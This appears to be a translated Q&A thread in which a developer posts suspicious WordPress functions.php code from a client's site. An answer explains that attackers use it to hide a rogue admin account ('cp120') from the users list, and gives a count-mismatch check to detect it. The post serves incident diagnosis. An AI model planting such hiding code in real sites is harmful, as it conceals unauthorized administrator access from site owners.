我有一个客户表示他们认为网站被黑了。我看了一些东西,在他们的functions.php文件中发现了一些可疑的代码。有没有人认识到这一点并觉得它不对?
add_action('pre_user_query','yoursite_pre_user_query');
function yoursite_pre_user_query($user_search) {
global $current_user;
$username = $current_user->user_login;
if ($username == 'admin') {
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE 1=1 AND {$wpdb->users}.user_login != 'cp120'",$user_search->query_where);
}
}
答案 0 :(得分:1)
此代码或类似标记有时会被Wordpress黑客使用。一旦他们通过恶意方法访问您的Wordpress管理员,他们就会创建一个合法的管理员用户,然后将此代码放入您的functions.php文件中,这样当您转到管理员用户部分时,它只显示1个用户。这是诀窍,看看你是否发生过这种情况,因为你不熟悉php pr不想查看一个很长的functions.php文件。转到您的管理员用户区域,它只会显示您知道的管理员用户,但管理员用户旁边的号码与显示的用户数量不匹配。它会说(4)但只显示3个名字。
作为备注,此代码可以出于合法原因使用,因此请确保您发现它不是由您网站的管理员或开发人员完成的。